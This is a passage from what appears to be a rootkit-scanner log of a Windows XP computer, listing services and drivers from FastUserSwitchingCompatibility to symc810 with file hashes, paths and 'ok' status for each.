20:31:23.0718 2536 [ 99BC0B50F511924348BE19C7C7313BBF ] FastUserSwitchingCompatibility C:\WINDOWS\System32\shsvcs.dll
20:31:23.0734 2536 FastUserSwitchingCompatibility - ok
20:31:23.0765 2536 [ E97D6A8684466DF94FF3BC24FB787A07 ] Fax C:\WINDOWS\system32\fxssvc.exe
20:31:23.0765 2536 Fax - ok
20:31:23.0781 2536 [ 92CDD60B6730B9F50F6A1A0C1F8CDC81 ] Fdc C:\WINDOWS\system32\DRIVERS\fdc.sys
20:31:23.0796 2536 Fdc - ok
20:31:23.0812 2536 [ D45926117EB9FA946A6AF572FBE1CAA3 ] Fips C:\WINDOWS\system32\drivers\Fips.sys
20:31:23.0812 2536 Fips - ok
20:31:23.0843 2536 [ 9D27E7B80BFCDF1CDD9B555862D5E7F0 ] Flpydisk C:\WINDOWS\system32\DRIVERS\flpydisk.sys
20:31:23.0843 2536 Flpydisk - ok
20:31:23.0875 2536 [ B2CF4B0786F8212CB92ED2B50C6DB6B0 ] FltMgr C:\WINDOWS\system32\drivers\fltmgr.sys
20:31:23.0875 2536 FltMgr - ok
20:31:23.0968 2536 [ 8BA7C024070F2B7FDD98ED8A4BA41789 ] FontCache3.0.0.0 c:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
20:31:23.0968 2536 FontCache3.0.0.0 - ok
20:31:24.0000 2536 [ 3E1E2BD4F39B0E2B7DC4F4D2BCC2779A ] Fs_Rec C:\WINDOWS\system32\drivers\Fs_Rec.sys
20:31:24.0015 2536 Fs_Rec - ok
20:31:24.0015 2536 [ 6AC26732762483366C3969C9E4D2259D ] Ftdisk C:\WINDOWS\system32\DRIVERS\ftdisk.sys
20:31:24.0031 2536 Ftdisk - ok
20:31:24.0062 2536 [ AB8A6A87D9D7255C3884D5B9541A6E80 ] GEARAspiWDM C:\WINDOWS\system32\Drivers\GEARAspiWDM.sys
20:31:24.0062 2536 GEARAspiWDM - ok
20:31:24.0078 2536 [ 0A02C63C8B144BD8C86B103DEE7C86A2 ] Gpc C:\WINDOWS\system32\DRIVERS\msgpc.sys
20:31:24.0078 2536 Gpc - ok
20:31:24.0156 2536 [ 506708142BC63DABA64F2D3AD1DCD5BF ] gupdate C:\Program Files\Google\Update\GoogleUpdate.exe
20:31:24.0156 2536 gupdate - ok
20:31:24.0156 2536 [ 506708142BC63DABA64F2D3AD1DCD5BF ] gupdatem C:\Program Files\Google\Update\GoogleUpdate.exe
20:31:24.0156 2536 gupdatem - ok
20:31:24.0187 2536 [ 573C7D0A32852B48F3058CFD8026F511 ] HDAudBus C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
20:31:24.0187 2536 HDAudBus - ok
20:31:24.0265 2536 [ 4FCCA060DFE0C51A09DD5C3843888BCD ] helpsvc C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll
20:31:24.0265 2536 helpsvc - ok
20:31:24.0265 2536 HidServ - ok
20:31:24.0312 2536 [ CCF82C5EC8A7326C3066DE870C06DAF1 ] HidUsb C:\WINDOWS\system32\DRIVERS\hidusb.sys
20:31:24.0312 2536 HidUsb - ok
20:31:24.0343 2536 [ 8878BD685E490239777BFE51320B88E9 ] hkmsvc C:\WINDOWS\System32\kmsvc.dll
20:31:24.0359 2536 hkmsvc - ok
20:31:24.0359 2536 hpn - ok
20:31:24.0468 2536 [ CE0FCEC4D4D860F36D972759B11EAF0F ] hpqcxs08 C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll
20:31:24.0500 2536 hpqcxs08 - ok
20:31:24.0515 2536 [ EE4C7A4CF2316701FFDE90F404520265 ] hpqddsvc C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll
20:31:24.0515 2536 hpqddsvc - ok
20:31:24.0578 2536 [ 5FABA4775D4C61E55EC669D643FFC71F ] HPZid412 C:\WINDOWS\system32\DRIVERS\HPZid412.sys
20:31:24.0578 2536 HPZid412 - ok
20:31:24.0578 2536 [ A3C43980EE1F1BEAC778B44EA65DBDD4 ] HPZipr12 C:\WINDOWS\system32\DRIVERS\HPZipr12.sys
20:31:24.0593 2536 HPZipr12 - ok
20:31:24.0593 2536 [ 2906949BD4E206F2BB0DD1896CE9F66F ] HPZius12 C:\WINDOWS\system32\DRIVERS\HPZius12.sys
20:31:24.0593 2536 HPZius12 - ok
20:31:24.0656 2536 [ F80A415EF82CD06FFAF0D971528EAD38 ] HTTP C:\WINDOWS\system32\Drivers\HTTP.sys
20:31:24.0656 2536 HTTP - ok
20:31:24.0703 2536 [ 6100A808600F44D999CEBDEF8841C7A3 ] HTTPFilter C:\WINDOWS\System32\w3ssl.dll
20:31:24.0718 2536 HTTPFilter - ok
20:31:24.0734 2536 i2omgmt - ok
20:31:24.0750 2536 i2omp - ok
20:31:24.0796 2536 [ 4A0B06AA8943C1E332520F7440C0AA30 ] i8042prt C:\WINDOWS\system32\DRIVERS\i8042prt.sys
20:31:24.0796 2536 i8042prt - ok
20:31:24.0890 2536 [ 0ACEBB31989CBF9A5663FE4A33D28D21 ] ialm C:\WINDOWS\system32\DRIVERS\ialmnt5.sys
20:31:24.0921 2536 ialm - ok
20:31:25.0000 2536 [ C01AC32DC5C03076CFB852CB5DA5229C ] idsvc C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
20:31:25.0031 2536 idsvc - ok
20:31:25.0046 2536 [ 083A052659F5310DD8B6A6CB05EDCF8E ] Imapi C:\WINDOWS\system32\DRIVERS\imapi.sys
20:31:25.0046 2536 Imapi - ok
20:31:25.0109 2536 [ 30DEAF54A9755BB8546168CFE8A6B5E1 ] ImapiService C:\WINDOWS\system32\imapi.exe
20:31:25.0109 2536 ImapiService - ok
20:31:25.0125 2536 ini910u - ok
20:31:25.0250 2536 [ D383CEF6C0EF6DCAC644E2B954F2C202 ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RtkHDAud.sys
20:31:25.0328 2536 IntcAzAudAddService - ok
20:31:25.0359 2536 [ B5466A9250342A7AA0CD1FBA13420678 ] IntelIde C:\WINDOWS\system32\DRIVERS\intelide.sys
20:31:25.0359 2536 IntelIde - ok
20:31:25.0406 2536 [ 8C953733D8F36EB2133F5BB58808B66B ] intelppm C:\WINDOWS\system32\DRIVERS\intelppm.sys
20:31:25.0406 2536 intelppm - ok
20:31:25.0421 2536 [ 3BB22519A194418D5FEC05D800A19AD0 ] ip6fw C:\WINDOWS\system32\drivers\ip6fw.sys
20:31:25.0437 2536 ip6fw - ok
20:31:25.0468 2536 [ 731F22BA402EE4B62748ADAF6363C182 ] IpFilterDriver C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
20:31:25.0468 2536 IpFilterDriver - ok
20:31:25.0484 2536 [ B87AB476DCF76E72010632B5550955F5 ] IpInIp C:\WINDOWS\system32\DRIVERS\ipinip.sys
20:31:25.0484 2536 IpInIp - ok
20:31:25.0531 2536 [ CC748EA12C6EFFDE940EE98098BF96BB ] IpNat C:\WINDOWS\system32\DRIVERS\ipnat.sys
20:31:25.0531 2536 IpNat - ok
20:31:25.0578 2536 [ 62937A89470AF8FF172F0980CA8AEFC9 ] iPod Service C:\Program Files\iPod\bin\iPodService.exe
20:31:25.0593 2536 iPod Service - ok
20:31:25.0625 2536 [ 23C74D75E36E7158768DD63D92789A91 ] IPSec C:\WINDOWS\system32\DRIVERS\ipsec.sys
20:31:25.0625 2536 IPSec - ok
20:31:25.0656 2536 [ C93C9FF7B04D772627A3646D89F7BF89 ] IRENUM C:\WINDOWS\system32\DRIVERS\irenum.sys
20:31:25.0656 2536 IRENUM - ok
20:31:25.0703 2536 [ 05A299EC56E52649B1CF2FC52D20F2D7 ] isapnp C:\WINDOWS\system32\DRIVERS\isapnp.sys
20:31:25.0703 2536 isapnp - ok
20:31:25.0750 2536 [ F59C3569A2F2C464BB78CB1BDCDCA55E ] Iviaspi C:\WINDOWS\system32\drivers\iviaspi.sys
20:31:25.0750 2536 Iviaspi - ok
20:31:25.0859 2536 [ 32192B4EBE8720ED8D49A455C962CB91 ] JavaQuickStarterService C:\Program Files\Java\jre6\bin\jqs.exe
20:31:25.0859 2536 JavaQuickStarterService - ok
20:31:25.0875 2536 [ 463C1EC80CD17420A542B7F36A36F128 ] Kbdclass C:\WINDOWS\system32\DRIVERS\kbdclass.sys
20:31:25.0875 2536 Kbdclass - ok
20:31:25.0921 2536 [ 692BCF44383D056AED41B045A323D378 ] kmixer C:\WINDOWS\system32\drivers\kmixer.sys
20:31:25.0921 2536 kmixer - ok
20:31:25.0953 2536 [ B467646C54CC746128904E1654C750C1 ] KSecDD C:\WINDOWS\system32\drivers\KSecDD.sys
20:31:25.0953 2536 KSecDD - ok
20:31:26.0015 2536 [ 4103DBB6CAA85E40D271C1AD12BBF776 ] L8042pr2 C:\WINDOWS\system32\DRIVERS\L8042pr2.Sys
20:31:26.0015 2536 L8042pr2 - ok
20:31:26.0046 2536 [ 3A7C3CBE5D96B8AE96CE81F0B22FB527 ] lanmanserver C:\WINDOWS\System32\srvsvc.dll
20:31:26.0062 2536 lanmanserver - ok
20:31:26.0109 2536 [ A8888A5327621856C0CEC4E385F69309 ] lanmanworkstation C:\WINDOWS\System32\wkssvc.dll
20:31:26.0125 2536 lanmanworkstation - ok
20:31:26.0140 2536 lbrtfdc - ok
20:31:26.0187 2536 [ A7DB739AE99A796D91580147E919CC59 ] LmHosts C:\WINDOWS\System32\lmhsvc.dll
20:31:26.0187 2536 LmHosts - ok
20:31:26.0218 2536 [ B666F835C18974F392A387C6E863072F ] LMouFlt2 C:\WINDOWS\system32\DRIVERS\LMouFlt2.Sys
20:31:26.0218 2536 LMouFlt2 - ok
20:31:26.0328 2536 [ E6CB119EF2E148EAA1A247343550756E ] McciCMService C:\Program Files\Common Files\Motive\McciCMService.exe
20:31:26.0343 2536 McciCMService - ok
20:31:26.0359 2536 [ 986B1FF5814366D71E0AC5755C88F2D3 ] Messenger C:\WINDOWS\System32\msgsvc.dll
20:31:26.0375 2536 Messenger - ok
20:31:26.0406 2536 [ 4AE068242760A1FB6E1A44BF4E16AFA6 ] mnmdd C:\WINDOWS\system32\drivers\mnmdd.sys
20:31:26.0406 2536 mnmdd - ok
20:31:26.0437 2536 [ D18F1F0C101D06A1C1ADF26EED16FCDD ] mnmsrvc C:\WINDOWS\System32\mnmsrvc.exe
20:31:26.0437 2536 mnmsrvc - ok
20:31:26.0468 2536 [ DFCBAD3CEC1C5F964962AE10E0BCC8E1 ] Modem C:\WINDOWS\system32\drivers\Modem.sys
20:31:26.0468 2536 Modem - ok
20:31:26.0484 2536 [ 35C9E97194C8CFB8430125F8DBC34D04 ] Mouclass C:\WINDOWS\system32\DRIVERS\mouclass.sys
20:31:26.0484 2536 Mouclass - ok
20:31:26.0546 2536 [ B1C303E17FB9D46E87A98E4BA6769685 ] mouhid C:\WINDOWS\system32\DRIVERS\mouhid.sys
20:31:26.0546 2536 mouhid - ok
20:31:26.0578 2536 [ A80B9A0BAD1B73637DBCBBA7DF72D3FD ] MountMgr C:\WINDOWS\system32\drivers\MountMgr.sys
20:31:26.0578 2536 MountMgr - ok
20:31:26.0640 2536 [ 730A519505621DF46BCBF9CDAC9FB6AD ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
20:31:26.0656 2536 MozillaMaintenance - ok
20:31:26.0687 2536 MpKsl08115bda - ok
20:31:26.0687 2536 mraid35x - ok
20:31:26.0718 2536 [ 9BD4DCB5412921864A7AACDEDFBD1923 ] MREMP50 C:\PROGRA~1\COMMON~1\Motive\MREMP50.SYS
20:31:26.0718 2536 MREMP50 - ok
20:31:26.0750 2536 [ 2BC9E43F55DE8C30FC817ED56D0EE907 ] MREMPR5 C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS
20:31:26.0750 2536 MREMPR5 - ok
20:31:26.0765 2536 [ 594B9D8194E3F4ECBF0325BD10BBEB05 ] MRENDIS5 C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS
20:31:26.0765 2536 MRENDIS5 - ok
20:31:26.0796 2536 [ 07C02C892E8E1A72D6BF35004F0E9C5E ] MRESP50 C:\PROGRA~1\COMMON~1\Motive\MRESP50.SYS
20:31:26.0796 2536 MRESP50 - ok
20:31:26.0812 2536 mrtRate - ok
20:31:26.0843 2536 [ 11D42BB6206F33FBB3BA0288D3EF81BD ] MRxDAV C:\WINDOWS\system32\DRIVERS\mrxdav.sys
20:31:26.0843 2536 MRxDAV - ok
20:31:26.0906 2536 [ 7D304A5EB4344EBEEAB53A2FE3FFB9F0 ] MRxSmb C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
20:31:26.0921 2536 MRxSmb - ok
20:31:26.0953 2536 [ A137F1470499A205ABBB9AAFB3B6F2B1 ] MSDTC C:\WINDOWS\System32\msdtc.exe
20:31:26.0968 2536 MSDTC - ok
20:31:26.0984 2536 [ C941EA2454BA8350021D774DAF0F1027 ] Msfs C:\WINDOWS\system32\drivers\Msfs.sys
20:31:26.0984 2536 Msfs - ok
20:31:26.0984 2536 MSIServer - ok
20:31:27.0015 2536 [ D1575E71568F4D9E14CA56B7B0453BF1 ] MSKSSRV C:\WINDOWS\system32\drivers\MSKSSRV.sys
20:31:27.0015 2536 MSKSSRV - ok
20:31:27.0031 2536 [ 325BB26842FC7CCC1FCCE2C457317F3E ] MSPCLOCK C:\WINDOWS\system32\drivers\MSPCLOCK.sys
20:31:27.0031 2536 MSPCLOCK - ok
20:31:27.0031 2536 [ BAD59648BA099DA4A17680B39730CB3D ] MSPQM C:\WINDOWS\system32\drivers\MSPQM.sys
20:31:27.0046 2536 MSPQM - ok
20:31:27.0062 2536 [ AF5F4F3F14A8EA2C26DE30F7A1E17136 ] mssmbios C:\WINDOWS\system32\DRIVERS\mssmbios.sys
20:31:27.0062 2536 mssmbios - ok
20:31:27.0093 2536 [ DE6A75F5C270E756C5508D94B6CF68F5 ] Mup C:\WINDOWS\system32\drivers\Mup.sys
20:31:27.0093 2536 Mup - ok
20:31:27.0140 2536 [ 0102140028FAD045756796E1C685D695 ] napagent C:\WINDOWS\System32\qagentrt.dll
20:31:27.0171 2536 napagent - ok
20:31:27.0218 2536 [ 1DF7F42665C94B825322FAE71721130D ] NDIS C:\WINDOWS\system32\drivers\NDIS.sys
20:31:27.0218 2536 NDIS - ok
20:31:27.0265 2536 [ 0109C4F3850DFBAB279542515386AE22 ] NdisTapi C:\WINDOWS\system32\DRIVERS\ndistapi.sys
20:31:27.0265 2536 NdisTapi - ok
20:31:27.0281 2536 [ F927A4434C5028758A842943EF1A3849 ] Ndisuio C:\WINDOWS\system32\DRIVERS\ndisuio.sys
20:31:27.0281 2536 Ndisuio - ok
20:31:27.0281 2536 [ EDC1531A49C80614B2CFDA43CA8659AB ] NdisWan C:\WINDOWS\system32\DRIVERS\ndiswan.sys
20:31:27.0296 2536 NdisWan - ok
20:31:27.0312 2536 [ 9282BD12DFB069D3889EB3FCC1000A9B ] NDProxy C:\WINDOWS\system32\drivers\NDProxy.sys
20:31:27.0312 2536 NDProxy - ok
20:31:27.0375 2536 [ 2969D26EEE289BE7422AA46FC55F4E38 ] Net Driver HPZ12 C:\WINDOWS\system32\HPZinw12.dll
20:31:27.0390 2536 Net Driver HPZ12 - ok
20:31:27.0390 2536 [ 5D81CF9A2F1A3A756B66CF684911CDF0 ] NetBIOS C:\WINDOWS\system32\DRIVERS\netbios.sys
20:31:27.0390 2536 NetBIOS - ok
20:31:27.0421 2536 [ 74B2B2F5BEA5E9A3DC021D685551BD3D ] NetBT C:\WINDOWS\system32\DRIVERS\netbt.sys
20:31:27.0421 2536 NetBT - ok
20:31:27.0468 2536 [ B857BA82860D7FF85AE29B095645563B ] NetDDE C:\WINDOWS\system32\netdde.exe
20:31:27.0484 2536 NetDDE - ok
20:31:27.0484 2536 [ B857BA82860D7FF85AE29B095645563B ] NetDDEdsdm C:\WINDOWS\system32\netdde.exe
20:31:27.0500 2536 NetDDEdsdm - ok
20:31:27.0531 2536 [ BF2466B3E18E970D8A976FB95FC1CA85 ] Netlogon C:\WINDOWS\system32\lsass.exe
20:31:27.0546 2536 Netlogon - ok
20:31:27.0562 2536 [ 13E67B55B3ABD7BF3FE7AAE5A0F9A9DE ] Netman C:\WINDOWS\System32\netman.dll
20:31:27.0578 2536 Netman - ok
20:31:27.0609 2536 [ D34612C5D02D026535B3095D620626AE ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
20:31:27.0609 2536 NetTcpPortSharing - ok
20:31:27.0640 2536 [ E9E47CFB2D461FA0FC75B7A74C6383EA ] NIC1394 C:\WINDOWS\system32\DRIVERS\nic1394.sys
20:31:27.0656 2536 NIC1394 - ok
20:31:27.0703 2536 [ 943337D786A56729263071623BBB9DE5 ] Nla C:\WINDOWS\System32\mswsock.dll
20:31:27.0718 2536 Nla - ok
20:31:27.0750 2536 [ 3182D64AE053D6FB034F44B6DEF8034A ] Npfs C:\WINDOWS\system32\drivers\Npfs.sys
20:31:27.0750 2536 Npfs - ok
20:31:27.0828 2536 [ 78A08DD6A8D65E697C18E1DB01C5CDCA ] Ntfs C:\WINDOWS\system32\drivers\Ntfs.sys
20:31:27.0843 2536 Ntfs - ok
20:31:27.0859 2536 [ BF2466B3E18E970D8A976FB95FC1CA85 ] NtLmSsp C:\WINDOWS\System32\lsass.exe
20:31:27.0859 2536 NtLmSsp - ok
20:31:27.0890 2536 [ 156F64A3345BD23C600655FB4D10BC08 ] NtmsSvc C:\WINDOWS\system32\ntmssvc.dll
20:31:27.0906 2536 NtmsSvc - ok
20:31:27.0953 2536 [ 73C1E1F395918BC2C6DD67AF7591A3AD ] Null C:\WINDOWS\system32\drivers\Null.sys
20:31:27.0953 2536 Null - ok
20:31:27.0968 2536 [ B305F3FAD35083837EF46A0BBCE2FC57 ] NwlnkFlt C:\WINDOWS\system32\DRIVERS\nwlnkflt.sys
20:31:27.0968 2536 NwlnkFlt - ok
20:31:27.0984 2536 [ C99B3415198D1AAB7227F2C88FD664B9 ] NwlnkFwd C:\WINDOWS\system32\DRIVERS\nwlnkfwd.sys
20:31:27.0984 2536 NwlnkFwd - ok
20:31:28.0015 2536 [ CA33832DF41AFB202EE7AEB05145922F ] ohci1394 C:\WINDOWS\system32\DRIVERS\ohci1394.sys
20:31:28.0015 2536 ohci1394 - ok
20:31:28.0125 2536 [ 7A56CF3E3F12E8AF599963B16F50FB6A ] ose C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
20:31:28.0125 2536 ose - ok
20:31:28.0156 2536 [ 5575FAF8F97CE5E713D108C2A58D7C7C ] Parport C:\WINDOWS\system32\DRIVERS\parport.sys
20:31:28.0156 2536 Parport - ok
20:31:28.0156 2536 [ BEB3BA25197665D82EC7065B724171C6 ] PartMgr C:\WINDOWS\system32\drivers\PartMgr.sys
20:31:28.0171 2536 PartMgr - ok
20:31:28.0203 2536 [ 70E98B3FD8E963A6A46A2E6247E0BEA1 ] ParVdm C:\WINDOWS\system32\drivers\ParVdm.sys
20:31:28.0203 2536 ParVdm - ok
20:31:28.0218 2536 [ A219903CCF74233761D92BEF471A07B1 ] PCI C:\WINDOWS\system32\DRIVERS\pci.sys
20:31:28.0218 2536 PCI - ok
20:31:28.0234 2536 PCIDump - ok
20:31:28.0265 2536 [ CCF5F451BB1A5A2A522A76E670000FF0 ] PCIIde C:\WINDOWS\system32\DRIVERS\pciide.sys
20:31:28.0265 2536 PCIIde - ok
20:31:28.0296 2536 [ 9E89EF60E9EE05E3F2EEF2DA7397F1C1 ] Pcmcia C:\WINDOWS\system32\drivers\Pcmcia.sys
20:31:28.0296 2536 Pcmcia - ok
20:31:28.0296 2536 PDCOMP - ok
20:31:28.0312 2536 PDFRAME - ok
20:31:28.0328 2536 PDRELI - ok
20:31:28.0328 2536 PDRFRAME - ok
20:31:28.0343 2536 perc2 - ok
20:31:28.0359 2536 perc2hib - ok
20:31:28.0390 2536 [ 444F122E68DB44C0589227781F3C8B3F ] Pfc C:\WINDOWS\system32\drivers\pfc.sys
20:31:28.0390 2536 Pfc - ok
20:31:28.0406 2536 [ 65DF52F5B8B6E9BBD183505225C37315 ] PlugPlay C:\WINDOWS\system32\services.exe
20:31:28.0421 2536 PlugPlay - ok
20:31:28.0437 2536 [ BAFC9706BDF425A02B66468AB2605C59 ] Pml Driver HPZ12 C:\WINDOWS\system32\HPZipm12.dll
20:31:28.0437 2536 Pml Driver HPZ12 - ok
20:31:28.0453 2536 [ BF2466B3E18E970D8A976FB95FC1CA85 ] PolicyAgent C:\WINDOWS\system32\lsass.exe
20:31:28.0453 2536 PolicyAgent - ok
20:31:28.0484 2536 [ EFEEC01B1D3CF84F16DDD24D9D9D8F99 ] PptpMiniport C:\WINDOWS\system32\DRIVERS\raspptp.sys
20:31:28.0484 2536 PptpMiniport - ok
20:31:28.0515 2536 [ A32BEBAF723557681BFC6BD93E98BD26 ] Processor C:\WINDOWS\system32\DRIVERS\processr.sys
20:31:28.0515 2536 Processor - ok
20:31:28.0515 2536 [ BF2466B3E18E970D8A976FB95FC1CA85 ] ProtectedStorage C:\WINDOWS\system32\lsass.exe
20:31:28.0531 2536 ProtectedStorage - ok
20:31:28.0562 2536 [ 390C204CED3785609AB24E9C52054A84 ] Ps2 C:\WINDOWS\system32\DRIVERS\PS2.sys
20:31:28.0562 2536 Ps2 - ok
20:31:28.0593 2536 [ 09298EC810B07E5D582CB3A3F9255424 ] PSched C:\WINDOWS\system32\DRIVERS\psched.sys
20:31:28.0593 2536 PSched - ok
20:31:28.0625 2536 [ 80D317BD1C3DBC5D4FE7B1678C60CADD ] Ptilink C:\WINDOWS\system32\DRIVERS\ptilink.sys
20:31:28.0625 2536 Ptilink - ok
20:31:28.0671 2536 [ E42E3433DBB4CFFE8FDD91EAB29AEA8E ] PxHelp20 C:\WINDOWS\system32\DRIVERS\PxHelp20.sys
20:31:28.0671 2536 PxHelp20 - ok
20:31:28.0687 2536 ql1080 - ok
20:31:28.0687 2536 Ql10wnt - ok
20:31:28.0703 2536 ql12160 - ok
20:31:28.0718 2536 ql1240 - ok
20:31:28.0718 2536 ql1280 - ok
20:31:28.0765 2536 [ FE0D99D6F31E4FAD8159F690D68DED9C ] RasAcd C:\WINDOWS\system32\DRIVERS\rasacd.sys
20:31:28.0765 2536 RasAcd - ok
20:31:28.0796 2536 [ AD188BE7BDF94E8DF4CA0A55C00A5073 ] RasAuto C:\WINDOWS\System32\rasauto.dll
20:31:28.0812 2536 RasAuto - ok
20:31:28.0843 2536 [ 11B4A627BC9614B885C4969BFA5FF8A6 ] Rasl2tp C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
20:31:28.0843 2536 Rasl2tp - ok
20:31:28.0890 2536 [ 76A9A3CBEADD68CC57CDA5E1D7448235 ] RasMan C:\WINDOWS\System32\rasmans.dll
20:31:28.0906 2536 RasMan - ok
20:31:28.0906 2536 [ 5BC962F2654137C9909C3D4603587DEE ] RasPppoe C:\WINDOWS\system32\DRIVERS\raspppoe.sys
20:31:28.0921 2536 RasPppoe - ok
20:31:28.0921 2536 [ FDBB1D60066FCFBB7452FD8F9829B242 ] Raspti C:\WINDOWS\system32\DRIVERS\raspti.sys
20:31:28.0921 2536 Raspti - ok
20:31:28.0968 2536 [ 7AD224AD1A1437FE28D89CF22B17780A ] Rdbss C:\WINDOWS\system32\DRIVERS\rdbss.sys
20:31:28.0968 2536 Rdbss - ok
20:31:28.0984 2536 [ 4912D5B403614CE99C28420F75353332 ] RDPCDD C:\WINDOWS\system32\DRIVERS\RDPCDD.sys
20:31:28.0984 2536 RDPCDD - ok
20:31:29.0046 2536 [ 43AF5212BD8FB5BA6EED9754358BD8F7 ] RDPWD C:\WINDOWS\system32\drivers\RDPWD.sys
20:31:29.0046 2536 RDPWD - ok
20:31:29.0093 2536 [ 3C37BF86641BDA977C3BF8A840F3B7FA ] RDSessMgr C:\WINDOWS\system32\sessmgr.exe
20:31:29.0109 2536 RDSessMgr - ok
20:31:29.0140 2536 [ F828DD7E1419B6653894A8F97A0094C5 ] redbook C:\WINDOWS\system32\DRIVERS\redbook.sys
20:31:29.0140 2536 redbook - ok
20:31:29.0187 2536 [ 7E699FF5F59B5D9DE5390E3C34C67CF5 ] RemoteAccess C:\WINDOWS\System32\mprdim.dll
20:31:29.0187 2536 RemoteAccess - ok
20:31:29.0203 2536 [ AAED593F84AFA419BBAE8572AF87CF6A ] RpcLocator C:\WINDOWS\System32\locator.exe
20:31:29.0218 2536 RpcLocator - ok
20:31:29.0265 2536 [ 6B27A5C03DFB94B4245739065431322C ] RpcSs C:\WINDOWS\System32\rpcss.dll
20:31:29.0265 2536 RpcSs - ok
20:31:29.0296 2536 [ 471B3F9741D762ABE75E9DEEA4787E47 ] RSVP C:\WINDOWS\System32\rsvp.exe
20:31:29.0312 2536 RSVP - ok
20:31:29.0343 2536 [ 2EF9C0DC26B30B2318B1FC3FAA1F0AE7 ] rtl8139 C:\WINDOWS\system32\DRIVERS\R8139n51.SYS
20:31:29.0343 2536 rtl8139 - ok
20:31:29.0359 2536 [ BF2466B3E18E970D8A976FB95FC1CA85 ] SamSs C:\WINDOWS\system32\lsass.exe
20:31:29.0359 2536 SamSs - ok
20:31:29.0437 2536 [ 39763504067962108505BFF25F024345 ] SASDIFSV C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS
20:31:29.0453 2536 SASDIFSV - ok
20:31:29.0468 2536 [ 77B9FC20084B48408AD3E87570EB4A85 ] SASKUTIL C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS
20:31:29.0468 2536 SASKUTIL - ok
20:31:29.0500 2536 [ 86D007E7A654B9A71D1D7D856B104353 ] SCardSvr C:\WINDOWS\System32\SCardSvr.exe
20:31:29.0515 2536 SCardSvr - ok
20:31:29.0546 2536 [ 0A9A7365A1CA4319AA7C1D6CD8E4EAFA ] Schedule C:\WINDOWS\system32\schedsvc.dll
20:31:29.0562 2536 Schedule - ok
20:31:29.0609 2536 [ 90A3935D05B494A5A39D37E71F09A677 ] Secdrv C:\WINDOWS\system32\DRIVERS\secdrv.sys
20:31:29.0609 2536 Secdrv - ok
20:31:29.0640 2536 [ CBE612E2BB6A10E3563336191EDA1250 ] seclogon C:\WINDOWS\System32\seclogon.dll
20:31:29.0640 2536 seclogon - ok
20:31:29.0656 2536 [ 7FDD5D0684ECA8C1F68B4D99D124DCD0 ] SENS C:\WINDOWS\system32\sens.dll
20:31:29.0671 2536 SENS - ok
20:31:29.0671 2536 [ CCA207A8896D4C6A0C9CE29A4AE411A7 ] Serial C:\WINDOWS\system32\drivers\Serial.sys
20:31:29.0687 2536 Serial - ok
20:31:29.0718 2536 [ 8E6B8C671615D126FDC553D1E2DE5562 ] Sfloppy C:\WINDOWS\system32\drivers\Sfloppy.sys
20:31:29.0718 2536 Sfloppy - ok
20:31:29.0765 2536 [ 83F41D0D89645D7235C051AB1D9523AC ] SharedAccess C:\WINDOWS\System32\ipnathlp.dll
20:31:29.0781 2536 SharedAccess - ok
20:31:29.0812 2536 [ 99BC0B50F511924348BE19C7C7313BBF ] ShellHWDetection C:\WINDOWS\System32\shsvcs.dll
20:31:29.0828 2536 ShellHWDetection - ok
20:31:29.0843 2536 Simbad - ok
20:31:29.0890 2536 [ 94F6EEA8A688A37F71BF9C9AEAA42666 ] SiS315 C:\WINDOWS\system32\DRIVERS\sisgrp.sys
20:31:29.0890 2536 SiS315 - ok
20:31:29.0921 2536 [ 61CA562DEF09A782D26B3E7EDEC5369A ] SISAGP C:\WINDOWS\system32\DRIVERS\SISAGPX.sys
20:31:29.0921 2536 SISAGP - ok
20:31:29.0937 2536 [ 837D26F79A1647066D75C5C811887475 ] SiSkp C:\WINDOWS\system32\DRIVERS\srvkp.sys
20:31:29.0953 2536 SiSkp - ok
20:31:29.0953 2536 Sparrow - ok
20:31:30.0000 2536 [ AB8B92451ECB048A4D1DE7C3FFCB4A9F ] splitter C:\WINDOWS\system32\drivers\splitter.sys
20:31:30.0000 2536 splitter - ok
20:31:30.0062 2536 [ 60784F891563FB1B767F70117FC2428F ] Spooler C:\WINDOWS\system32\spoolsv.exe
20:31:30.0078 2536 Spooler - ok
20:31:30.0093 2536 [ 76BB022C2FB6902FD5BDD4F78FC13A5D ] sr C:\WINDOWS\system32\DRIVERS\sr.sys
20:31:30.0093 2536 sr - ok
20:31:30.0140 2536 [ 3805DF0AC4296A34BA4BF93B346CC378 ] srservice C:\WINDOWS\system32\srsvc.dll
20:31:30.0156 2536 srservice - ok
20:31:30.0187 2536 [ 47DDFC2F003F7F9F0592C6874962A2E7 ] Srv C:\WINDOWS\system32\DRIVERS\srv.sys
20:31:30.0203 2536 Srv - ok
20:31:30.0218 2536 [ 0A5679B3714EDAB99E357057EE88FCA6 ] SSDPSRV C:\WINDOWS\System32\ssdpsrv.dll
20:31:30.0218 2536 SSDPSRV - ok
20:31:30.0265 2536 [ A9573045BAA16EAB9B1085205B82F1ED ] StillCam C:\WINDOWS\system32\DRIVERS\serscan.sys
20:31:30.0265 2536 StillCam - ok
20:31:30.0281 2536 [ 8BAD69CBAC032D4BBACFCE0306174C30 ] stisvc C:\WINDOWS\system32\wiaservc.dll
20:31:30.0296 2536 stisvc - ok
20:31:30.0328 2536 [ 3941D127AEF12E93ADDF6FE6EE027E0F ] swenum C:\WINDOWS\system32\DRIVERS\swenum.sys
20:31:30.0328 2536 swenum - ok
20:31:30.0375 2536 [ 8CE882BCC6CF8A62F2B2323D95CB3D01 ] swmidi C:\WINDOWS\system32\drivers\swmidi.sys
20:31:30.0375 2536 swmidi - ok
20:31:30.0390 2536 SwPrv - ok
20:31:30.0406 2536 symc810 - ok
